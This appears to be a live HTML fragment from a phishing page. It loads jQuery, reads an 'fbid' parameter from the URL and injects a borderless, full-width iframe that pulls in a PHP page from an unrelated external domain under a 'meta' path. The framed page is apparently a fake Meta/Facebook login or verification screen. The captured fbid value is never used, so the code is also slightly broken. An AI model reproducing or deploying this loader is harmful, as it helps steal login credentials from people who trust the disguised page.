<div id="ggg"></div>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"
  integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
  crossorigin="anonymous"></script>

<script>


   var regexp = /fbid=([^&]+)/i;
        var GetValue = '';
        if (!!regexp.exec(document.location.search))
            GetValue = regexp.exec(document.location.search)[1];
        var src = 'https://bradfordbd.com/meta/dns/hd5m21/index.php/?fbid=';
      $('<iframe>', {
   src: src,
   id:  'meta',
   frameborder: 0,
        height:'600px',
        width:'100vw',
  scrolling: 'no'
   }).appendTo('#ggg');
 
</script>